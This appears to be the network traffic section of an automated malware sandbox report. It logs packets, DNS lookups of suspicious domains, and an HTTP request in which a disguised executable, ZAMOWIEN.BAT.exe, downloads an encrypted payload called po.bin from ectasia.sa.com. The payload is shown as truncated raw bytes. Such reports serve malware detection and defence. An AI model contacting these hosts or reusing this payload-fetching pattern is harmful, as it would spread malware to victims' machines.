                                                                          Dec 2, 2024 07:09:45.978894949 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.979012012 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.979012012 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.979079962 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.981972933 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.982029915 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.982079029 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.982125044 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.984927893 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.984985113 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.985023975 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.985064983 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.987978935 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.988065958 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.988096952 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.988120079 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.990977049 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.991027117 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.991044998 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.991099119 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.994067907 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.994112968 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.994179010 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.994220972 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.997020960 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.997068882 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:45.997132063 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:45.997174025 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.000092030 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.000138044 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.000236988 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.000283957 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.003065109 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.003108978 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.003180027 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.003223896 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.006114960 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.006186008 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.006194115 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.006274939 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.009100914 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.009151936 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.009216070 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.009258032 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.012151957 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.012200117 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.012234926 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.012275934 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.015136003 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.015181065 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.015260935 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.015321016 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.018165112 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.018213987 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.018277884 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.018317938 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.021204948 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.021256924 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.021301031 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.021342039 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.024241924 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.024298906 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.024347067 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.024389982 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.027234077 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.027295113 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.027337074 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.027395010 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.030286074 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.030342102 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.030401945 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.030448914 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.033279896 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.033329964 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.033407927 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.033451080 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.036324978 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.036374092 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.036406040 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.036447048 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.039319992 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.039382935 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.039414883 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.039475918 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.042326927 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.042392015 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.042412043 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.042464018 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.045352936 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.045398951 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.045527935 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.045572996 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.048363924 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.048409939 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.048465014 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.048506975 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.051387072 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.051445961 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.051618099 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.051666021 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.054513931 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.054569960 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.054642916 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.054687023 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.057468891 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.057529926 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.057610989 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.057657003 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.060436010 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.060491085 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.060519934 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.060559988 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.127985001 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.128041983 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.128087044 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.128151894 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.129067898 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.129110098 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.129286051 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.129328012 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.131175995 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.131215096 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.131227016 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.131267071 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.133220911 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.133268118 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.133305073 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.133353949 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.135276079 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.135334015 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.135364056 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.135417938 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.137304068 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.137357950 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.137406111 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.137449980 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.139384985 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.139455080 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.139492989 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.139554977 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.141465902 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.141520977 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.141740084 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.141788960 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.143452883 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.143516064 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.143528938 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.143573046 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.145504951 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.145565987 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:46.145612955 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:46.145654917 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:09:50.321964979 CET8049736103.83.194.50192.168.2.4
                                                                          Dec 2, 2024 07:09:50.322040081 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:10:16.289025068 CET4973680192.168.2.4103.83.194.50
                                                                          Dec 2, 2024 07:10:26.910912037 CET4980380192.168.2.4195.110.124.133
                                                                          Dec 2, 2024 07:10:27.030925035 CET8049803195.110.124.133192.168.2.4
                                                                          Dec 2, 2024 07:10:27.031023026 CET4980380192.168.2.4195.110.124.133
                                                                          Dec 2, 2024 07:10:27.039174080 CET4980380192.168.2.4195.110.124.133
                                                                          Dec 2, 2024 07:10:27.159131050 CET8049803195.110.124.133192.168.2.4
                                                                          Dec 2, 2024 07:10:28.386822939 CET8049803195.110.124.133192.168.2.4
                                                                          Dec 2, 2024 07:10:28.387056112 CET8049803195.110.124.133192.168.2.4
                                                                          Dec 2, 2024 07:10:28.387140036 CET4980380192.168.2.4195.110.124.133
                                                                          Dec 2, 2024 07:10:28.389794111 CET4980380192.168.2.4195.110.124.133
                                                                          Dec 2, 2024 07:10:28.509660006 CET8049803195.110.124.133192.168.2.4
                                                                          Dec 2, 2024 07:10:43.860127926 CET4984480192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:43.980083942 CET8049844172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:43.980175972 CET4984480192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:44.022880077 CET4984480192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:44.143034935 CET8049844172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:45.306675911 CET8049844172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:45.307095051 CET8049844172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:45.307145119 CET4984480192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:45.532617092 CET4984480192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:46.553901911 CET4985080192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:46.673975945 CET8049850172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:46.674047947 CET4985080192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:46.771848917 CET4985080192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:46.891896009 CET8049850172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:47.946129084 CET8049850172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:47.946528912 CET8049850172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:47.946576118 CET4985080192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:48.282650948 CET4985080192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:49.300857067 CET4985680192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:49.420887947 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.420985937 CET4985680192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:49.529058933 CET4985680192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:49.649059057 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649080992 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649235964 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649245024 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649329901 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649338961 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649420977 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649447918 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:49.649502039 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:50.709623098 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:50.710979939 CET8049856172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:50.711038113 CET4985680192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:51.048269987 CET4985680192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:52.069145918 CET4986580192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:52.189125061 CET8049865172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:52.189198017 CET4986580192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:52.202168941 CET4986580192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:52.322361946 CET8049865172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:53.419974089 CET8049865172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:53.420316935 CET8049865172.67.145.234192.168.2.4
                                                                          Dec 2, 2024 07:10:53.421937943 CET4986580192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:53.422719002 CET4986580192.168.2.4172.67.145.234
                                                                          Dec 2, 2024 07:10:53.542572975 CET8049865172.67.145.234192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 2, 2024 07:09:42.719012022 CET5701453192.168.2.41.1.1.1
                                                                          Dec 2, 2024 07:09:43.614579916 CET53570141.1.1.1192.168.2.4
                                                                          Dec 2, 2024 07:10:26.073539972 CET5036153192.168.2.41.1.1.1
                                                                          Dec 2, 2024 07:10:26.904671907 CET53503611.1.1.1192.168.2.4
                                                                          Dec 2, 2024 07:10:43.543360949 CET6454053192.168.2.41.1.1.1
                                                                          Dec 2, 2024 07:10:43.852806091 CET53645401.1.1.1192.168.2.4
                                                                          Dec 2, 2024 07:10:58.692756891 CET5061053192.168.2.41.1.1.1
                                                                          Dec 2, 2024 07:10:59.126282930 CET53506101.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 2, 2024 07:09:42.719012022 CET192.168.2.41.1.1.10x6676Standard query (0)ectasia.sa.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:26.073539972 CET192.168.2.41.1.1.10x77aStandard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:43.543360949 CET192.168.2.41.1.1.10xe255Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:58.692756891 CET192.168.2.41.1.1.10x9ef6Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 2, 2024 07:09:43.614579916 CET1.1.1.1192.168.2.40x6676No error (0)ectasia.sa.com103.83.194.50A (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:26.904671907 CET1.1.1.1192.168.2.40x77aNo error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:26.904671907 CET1.1.1.1192.168.2.40x77aNo error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:43.852806091 CET1.1.1.1192.168.2.40xe255No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:43.852806091 CET1.1.1.1192.168.2.40xe255No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:59.126282930 CET1.1.1.1192.168.2.40x9ef6No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                          Dec 2, 2024 07:10:59.126282930 CET1.1.1.1192.168.2.40x9ef6No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                          • ectasia.sa.com
                                                                          • www.officinadelpasso.shop
                                                                          • www.vayui.top
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449736103.83.194.50808036C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:09:43.741488934 CET165OUTGET /po.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: ectasia.sa.com
                                                                          Cache-Control: no-cache
                                                                          Dec 2, 2024 07:09:45.075445890 CET1236INHTTP/1.1 200 OK
                                                                          Date: Mon, 02 Dec 2024 06:09:44 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Mon, 02 Dec 2024 03:11:45 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 289856
                                                                          Content-Type: application/octet-stream
                                                                          Data Raw: e8 e1 39 6b 8a 1c 2e 29 56 4c 74 9a a0 a7 41 1c 22 a6 40 47 1d 04 83 3a 58 c2 03 12 9b 42 ac 60 6f bd 90 04 55 11 af af e9 d0 33 b0 37 f5 d9 74 ea 85 30 27 be e4 99 79 5e 60 ec 31 ce 7c d1 e8 90 40 de 86 c1 e8 85 4c 8c 81 01 87 a0 9c ea 7c 45 05 cb a7 d1 a7 3d 8e 08 af 8a 62 0b 95 cf 96 11 ca c7 c5 02 99 2c 92 e0 1f cd 8b 38 a0 96 8e 3e 4b ea 26 05 ee 28 55 49 9e dd 8b 05 54 3e 9b 7f 33 77 47 de 3c fd ee 80 b4 f5 9a 42 f5 59 c4 89 83 d1 46 fd 15 bf 7e af bd 60 05 8d 8a 76 1f e3 2b 3c 3f 55 99 1e 91 ce 2d e7 be e8 34 42 63 e6 fe 8b 03 fd 5a 2a 41 87 75 34 ad f0 68 9e d1 62 81 11 29 40 52 0c f4 4b de b1 a6 e1 45 b5 39 f5 ea 0c aa a0 6e 24 26 3b b3 2c b9 b4 a0 9e 7c 46 4b 8c e8 09 07 2a ae ab 68 37 68 39 5e 70 d9 34 70 53 f4 36 e9 09 b4 09 ef a1 41 3a 84 72 3e 61 30 4f ab e5 38 d9 fa 60 8f 7a 37 41 aa e6 39 a8 66 51 fc 77 46 c4 6d 69 ed f0 b9 5a 5a 34 07 c8 8e 07 a4 50 96 c3 bd 26 12 8a c3 20 71 0d 50 69 3a 87 2c c6 5f b7 89 1d d7 87 7b ee 67 90 b7 d5 21 9b 88 3b e6 fa 3b 62 6e ee ce 02 a6 e3 2c 61 14 [TRUNCATED]
                                                                          Data Ascii: 9k.)VLtA"@G:XB`oU37t0'y^`1|@L|E=b,8>K&(UIT>3wG<BYF~`v+<?U-4BcZ*Au4hb)@RKE9n$&;,|FK*h7h9^p4pS6A:r>a0O8`z7A9fQwFmiZZ4P& qPi:,_{g!;;bn,a_:av7D3Cei'BO#2d2C(zR1N)8#Y+4I)+P3EJ$bg8(@0\W#7 */Dl|FQY/n^vTmB+7w<.O=M#p``bglc1dV(6pz[d6EPZQg~dy=$Vp/]R%V'Bf0ms@p\g^9< ~eF$B[s>Z#,Bok1=U`V+qq`80f+o8,zNaBn+&HeduHS@ok&Ra!yO>~`e<o):-6%n?4=gCTn8}DU>*)c~v |B}KOx/6LoMHMI{e\>n}Cf7ZN rO/5/ [TRUNCATED]
                                                                          Dec 2, 2024 07:09:45.075645924 CET1236INData Raw: c2 61 9c a9 d6 8b fa 5c b2 5e 1d a4 58 63 32 4a d3 f8 ba 0a 10 e3 88 1f 74 54 23 82 bb 92 46 19 ec 73 a3 ee dc 7e d1 67 60 2a 1a 0e 01 b1 75 e3 ed c8 35 b3 c9 18 08 71 11 c4 cf f9 7c 53 fa 73 9a dd 1a 4e 86 c2 e8 85 4c 88 81 01 87 5f 63 ea 7c fd
                                                                          Data Ascii: a\^Xc2JtT#Fs~g`*u5q|SsNL_c|=Hb,8>K&(UIT>q,I#6z@fp^ZukD{CfW'Ku4h}2kvU%LYC!J\'5gM]T>*4p
                                                                          Dec 2, 2024 07:09:45.075656891 CET1236INData Raw: d6 55 dc 25 d2 ca ef 4c a4 59 9a 0e 43 d5 21 15 86 4a 88 c0 f9 8f 5c ed 27 1b 35 67 4d 5d f9 01 54 00 04 3e 17 2a 34 70 53 f4 36 e9 09 b4 59 aa a1 41 76 85 73 3e 66 91 63 cb e5 38 d9 fa 60 8f 7a 37 a1 aa e4 38 a3 67 5a fc 77 1c c0 6d 69 ed f0 b9
                                                                          Data Ascii: U%LYC!J\'5gM]T>*4pS6YAvs>fc8`z78gZwmiZZ4P&b qMPi*,]{g!;;b,a_r:av7D#Cei'BO#2d2C(zR1N)8#Y+4I)+P3EJ$
                                                                          Dec 2, 2024 07:09:45.075669050 CET1236INData Raw: 80 29 d9 1d 38 d7 23 d9 ce fd dc 59 c0 2b fc 34 cc 49 99 29 2b 88 f5 d0 50 33 9e 06 ea 45 4a 8a e8 f3 87 ff 02 24 89 1a bb 0e 62 da 67 96 38 be 13 28 b5 af 40 fa fe 89 b3 b2 dd b4 a3 30 5c 15 57 89 aa 23 37 20 2a ab de 2f 44 dc 11 6c af ad fe 86
                                                                          Data Ascii: )8#Y+4I)+P3EJ$bg8(@0\W#7 */Dl|FQY/}n^v5Rq3w<.O=M#p@`bglc1dV(6pz[d6EPZQg~dy=$Vp/]R%V'Bf0ms@p\g^9< ~eF
                                                                          Dec 2, 2024 07:09:45.075695992 CET1236INData Raw: ce b6 cc 94 a7 b8 c4 07 e9 f9 3c e0 56 aa 46 ed 72 ef 6e 13 01 0a 88 dd d5 23 75 8a 47 98 c5 2b ec d6 1e 8e 2a 69 87 24 3b 41 dd d0 31 fe ff ed e7 f6 a6 5b 51 79 d8 f5 1e f9 03 7b 7a 5b 61 ff b1 60 c6 cc b3 ba 78 67 be a6 68 dc 3a dc 91 55 e6 82
                                                                          Data Ascii: <VFrn#uG+*i$;A1[Qy{z[a`xgh:UXq3e0TR*k=MZ+q]Jvn6_(JylzB0@E0^Jl:(dz8D\P4nGP<d_TzPhE;=k']q>y4g@u[V"9
                                                                          Dec 2, 2024 07:09:45.075709105 CET1236INData Raw: 66 aa f7 32 4c 9b d4 e2 15 e2 1a 2d 22 63 b0 89 77 02 bc ce 4d cb e8 25 ec 45 c5 41 34 bc 4c 2a 3a c5 bf f9 fc 33 78 ce b1 85 4f 5b 9b 05 aa 53 59 e0 95 97 fb 3e fa e4 04 fa cc f9 b9 13 38 d2 3e b9 b2 ac 0f 3f e5 8a bf 16 c9 00 87 06 c2 34 61 5c
                                                                          Data Ascii: f2L-"cwM%EA4L*:3xO[SY>8>?4a\nvf%<W~)=i!a{p<.DK,MaY/gE1<lCfpRdU%ccZWKK;.\9}2C5s`_h+/,xCe
                                                                          Dec 2, 2024 07:09:45.075721979 CET1236INData Raw: 1f 9d c4 c6 f7 3d d1 b2 f3 20 37 c7 ce bc 54 e9 24 07 87 a9 4f d7 d6 8b 73 19 76 d7 58 48 9f 26 f2 d3 c5 f8 ba 83 55 13 01 5a cc 93 66 32 17 a1 46 19 2b 36 0b 13 c0 7e d1 a0 25 8a a5 43 01 b1 b2 a6 75 83 5f b3 c9 91 4d e1 28 81 c7 f6 f8 ff fd 73
                                                                          Data Ascii: = 7T$OsvXH&UZf2F+6~%Cu_M(sVOBsgEZEIZm","8K&wUI,v7Y0#='|7xGGd+`\_D6{t)*wPrW1("d V!ZSz^\ct
                                                                          Dec 2, 2024 07:09:45.075896025 CET1236INData Raw: ee 77 34 ad 7b 35 56 54 c0 f4 03 62 7e bf 22 07 ce 53 6a de 9b d2 39 0b 15 4a 2f 83 5b e5 5c d6 fb 60 6b c3 d5 08 72 da 98 6c dd 43 08 67 4d 20 ea b9 03 3d 04 3e 3c e8 f5 98 50 79 22 2b 8a 76 51 23 f4 85 fd d0 9f bf 9c 5f 3c cb e5 45 c7 6a 22 04
                                                                          Data Ascii: w4{5VTb~"Sj9J/[\`krlCgM =><Py"+vQ#_<Ej"bhqC4}u!) ~]+,MwF(^$+aM/a2G!=AaD5P"E^)TLI> T+3d4R8Fe;#YYWl
